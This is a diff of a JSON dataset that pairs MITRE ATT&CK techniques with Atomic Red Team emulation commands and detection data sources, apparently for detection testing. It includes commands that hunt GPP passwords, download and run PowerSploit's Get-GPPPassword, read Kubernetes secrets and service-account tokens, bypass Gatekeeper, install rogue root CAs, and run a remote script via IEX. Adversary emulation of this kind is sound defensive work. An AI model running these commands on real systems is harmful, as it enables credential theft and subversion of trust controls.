+ }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1552.006", + "command_list": [ + "findstr /S cpassword %logonserver%\\sysvol\\*.xml\n", + ". #{gpp_script_path}\nGet-GPPPassword -Verbose\n", + ". PathToAtomicsFolder\\T1552.006\\src\\Get-GPPPassword.ps1\nGet-GPPPassword -Verbose\n" + ], + "commands": [ + { + "command": "findstr /S cpassword %logonserver%\\sysvol\\*.xml\n", + "source": "atomics/T1552.006/T1552.006.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Group Policy Preferences" + }, + { + "command": ". #{gpp_script_path}\nGet-GPPPassword -Verbose\n", + "source": "atomics/T1552.006/T1552.006.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Group Policy Preferences" + }, + { + "command": ". PathToAtomicsFolder\\T1552.006\\src\\Get-GPPPassword.ps1\nGet-GPPPassword -Verbose\n", + "source": "atomics/T1552.006/T1552.006.yaml", + "name": "Atomic Red Team Test - Unsecured Credentials: Group Policy Preferences" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1552.006", + "display_name": "Unsecured Credentials: Group Policy Preferences", + "atomic_tests": [ + { + "name": "GPP Passwords (findstr)", + "auto_generated_guid": "870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + } + ], + "executor": { + "command": "findstr /S cpassword %logonserver%\\sysvol\\*.xml\n", + "name": "command_prompt" + } + }, + { + "name": "GPP Passwords (Get-GPPPassword)", + "auto_generated_guid": "e9584f82-322c-474a-b831-940fd8b4455c", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller.\nThis test is intended to be run from a domain joined workstation, not on the Domain Controller itself.\nThe Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands.\n\nSuccessful test execution will either display the credentials found in the GPP files or indicate \"No preference files found\".\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "gpp_script_url": { + "description": "URL of the Get-GPPPassword PowerShell Script", + "type": "Url", + "default": "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1" + }, + "gpp_script_path": { + "description": "Path to the Get-GPPPassword PowerShell Script", + "type": "Path", + "default": "PathToAtomicsFolder\\T1552.006\\src\\Get-GPPPassword.ps1" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}\n", + "prereq_command": "if(Test-Path \"#{gpp_script_path}\") {exit 0 } else {exit 1 }\n", + "get_prereq_command": "New-Item -ItemType Directory (Split-Path \"#{gpp_script_path}\") -Force | Out-Null\nInvoke-WebRequest #{gpp_script_url} -OutFile \"#{gpp_script_path}\"\n" + }, + { + "description": "Computer must be domain joined\n", + "prereq_command": "if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host Joining this computer to a domain must be done manually\n" + } + ], + "executor": { + "command": ". #{gpp_script_path}\nGet-GPPPassword -Verbose\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1552.007", + "command_list": [ + "kubectl get secrets -n default\n", + "kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token\n" + ], + "commands": [ + { + "command": "kubectl get secrets -n default\n", + "source": "atomics/T1552.007/T1552.007.yaml", + "name": "Atomic Red Team Test - Kubernetes List Secrets" + }, + { + "command": "kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token\n", + "source": "atomics/T1552.007/T1552.007.yaml", + "name": "Atomic Red Team Test - Kubernetes List Secrets" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1552.007", + "display_name": "Kubernetes List Secrets", + "atomic_tests": [ + { + "name": "ListSecrets", + "auto_generated_guid": "43c3a49d-d15c-45e6-b303-f6e177e44a9a", + "description": "A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services.\n", + "supported_platforms": [ + "containers" + ], + "input_arguments": { + "namespace": { + "description": "K8s namespace to list", + "type": "String", + "default": "default" + } + }, + "dependencies": [ + { + "description": "kubectl must be installed\n", + "get_prereq_command": "echo \"kubectl must be installed manually\"\n", + "prereq_command": "which kubectl\n" + } + ], + "executor": { + "command": "kubectl get secrets -n #{namespace}\n", + "name": "bash", + "elevation_required": false + } + }, + { + "name": "Cat the contents of a Kubernetes service account token file", + "auto_generated_guid": "788e0019-a483-45da-bcfe-96353d46820f", + "description": "Access the Kubernetes service account access token stored within a container in a cluster.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Verify docker is installed.", + "prereq_command": "which docker\n", + "get_prereq_command": "if [ \"\" == \"`which docker`\" ]; then echo \"Docker Not Found\"; if [ -n \"`which apt-get`\" ]; then sudo apt-get -y install docker ; elif [ -n \"`which yum`\" ]; then sudo yum -y install docker ; fi ; else echo \"Docker installed\"; fi\n" + }, + { + "description": "Verify docker service is running.", + "prereq_command": "sudo systemctl status docker\n", + "get_prereq_command": "sudo systemctl start docker\n" + }, + { + "description": "Verify kind is in the path.", + "prereq_command": "which kind\n", + "get_prereq_command": "curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64\nchmod +x ./kind\nmv kind /usr/bin/kind\n" + }, + { + "description": "Verify kind-atomic-cluster is created", + "prereq_command": "sudo kind get clusters\n", + "get_prereq_command": "sudo kind create cluster --name atomic-cluster\n" + }, + { + "description": "Verify kubectl is in path", + "prereq_command": "which kubectl\n", + "get_prereq_command": "curl -LO \"https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl\"\nchmod +x ./kubectl\nmv kubectl /usr/bin/kubectl\n" + }, + { + "description": "Verify atomic-pod is running.", + "prereq_command": "kubectl --context kind-atomic-cluster get pods |grep atomic-pod\n", + "get_prereq_command": "kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity\n" + } + ], + "executor": { + "command": "kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token\n", + "name": "sh", + "cleanup_command": "kubectl --context kind-atomic-cluster delete pod atomic-pod\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ] + ] + }, + { + "technique_id": "T1553.001", + "command_list": [ + "sudo xattr -d com.apple.quarantine myapp.app\n" + ], + "commands": [ + { + "command": "sudo xattr -d com.apple.quarantine myapp.app\n", + "source": "atomics/T1553.001/T1553.001.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Gatekeeper Bypass" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1553.001", + "display_name": "Subvert Trust Controls: Gatekeeper Bypass", + "atomic_tests": [ + { + "name": "Gatekeeper Bypass", + "auto_generated_guid": "fb3d46c6-9480-4803-8d7d-ce676e1f1a9b", + "description": "Gatekeeper Bypass via command line\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "app_path": { + "description": "Path to app to be used", + "type": "Path", + "default": "myapp.app" + } + }, + "executor": { + "command": "sudo xattr -d com.apple.quarantine #{app_path}\n", + "elevation_required": true, + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1553.004", + "command_list": [ + "openssl genrsa -out #{key_filename} 4096\nopenssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out rootCA.crt\ncp rootCA.crt /etc/pki/ca-trust/source/anchors/\nupdate-ca-trust\n", + "openssl genrsa -out rootCA.key 4096\nopenssl req -x509 -new -nodes -key rootCA.key -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out #{cert_filename}\ncp #{cert_filename} /etc/pki/ca-trust/source/anchors/\nupdate-ca-trust\n", + "mv rootCA.crt /usr/local/share/ca-certificates\necho sudo update-ca-certificates\n", + "mv #{cert_filename} /usr/local/share/ca-certificates\necho sudo update-ca-certificates\n", + "sudo security add-trusted-cert -d -r trustRoot -k \"/Library/Keychains/System.keychain\" \"rootCA.crt\"\n", + "sudo security add-trusted-cert -d -r trustRoot -k \"/Library/Keychains/System.keychain\" \"#{cert_filename}\"\n", + "$cert = Import-Certificate -FilePath rootCA.cer -CertStoreLocation Cert:\\LocalMachine\\My\nMove-Item -Path $cert.PSPath -Destination \"Cert:\\LocalMachine\\Root\"\n", + "certutil -addstore my $env:Temp\\rootCA2.cer\n", + "IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) \n" + ], + "commands": [ + { + "command": "openssl genrsa -out #{key_filename} 4096\nopenssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out rootCA.crt\ncp rootCA.crt /etc/pki/ca-trust/source/anchors/\nupdate-ca-trust\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "openssl genrsa -out rootCA.key 4096\nopenssl req -x509 -new -nodes -key rootCA.key -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out #{cert_filename}\ncp #{cert_filename} /etc/pki/ca-trust/source/anchors/\nupdate-ca-trust\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "mv rootCA.crt /usr/local/share/ca-certificates\necho sudo update-ca-certificates\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "mv #{cert_filename} /usr/local/share/ca-certificates\necho sudo update-ca-certificates\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "sudo security add-trusted-cert -d -r trustRoot -k \"/Library/Keychains/System.keychain\" \"rootCA.crt\"\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "sudo security add-trusted-cert -d -r trustRoot -k \"/Library/Keychains/System.keychain\" \"#{cert_filename}\"\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "$cert = Import-Certificate -FilePath rootCA.cer -CertStoreLocation Cert:\\LocalMachine\\My\nMove-Item -Path $cert.PSPath -Destination \"Cert:\\LocalMachine\\Root\"\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "certutil -addstore my $env:Temp\\rootCA2.cer\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) \n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1553.004", + "display_name": "Subvert Trust Controls: Install Root Certificate", + "atomic_tests": [ + { + "name": "Install root CA on CentOS/RHEL", + "auto_generated_guid": "9c096ec4-fd42-419d-a762-d64cc950627e", + "description": "Creates a root CA with openssl\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "cert_filename": { + "description": "Path of the CA certificate we create", + "type": "Path", + "default": "rootCA.crt" + }, + "key_filename": { + "description": "Key we create that is used to create the CA certificate", + "type": "Path", + "default": "rootCA.key" + } + }, + "executor": { + "command": "openssl genrsa -out #{key_filename} 4096\nopenssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out #{cert_filename}\ncp #{cert_filename} /etc/pki/ca-trust/source/anchors/\nupdate-ca-trust\n", + "cleanup_command": "rm /etc/pki/ca-trust/source/anchors/#{cert_filename}\nupdate-ca-trust\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Install root CA on Debian/Ubuntu", + "auto_generated_guid": "53bcf8a0-1549-4b85-b919-010c56d724ff", + "description": "Creates a root CA with openssl\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "cert_filename": { + "description": "CA file name", + "type": "Path", + "default": "rootCA.crt" + }, + "key_filename": { + "description": "Key we create that is used to create the CA certificate", + "type": "Path", + "default": "rootCA.key" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Verify the certificate exists. It generates if not on disk.\n", + "prereq_command": "if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;\nopenssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out #{cert_filename}\n" + } + ], + "executor": { + "command": "mv #{cert_filename} /usr/local/share/ca-certificates\necho sudo update-ca-certificates\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Install root CA on macOS", + "auto_generated_guid": "cc4a0b8c-426f-40ff-9426-4e10e5bf4c49", + "description": "Creates a root CA with openssl\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "cert_filename": { + "description": "CA file name", + "type": "Path", + "default": "rootCA.crt" + }, + "key_filename": { + "description": "Key we create that is used to create the CA certificate", + "type": "Path", + "default": "rootCA.key" + } + }, 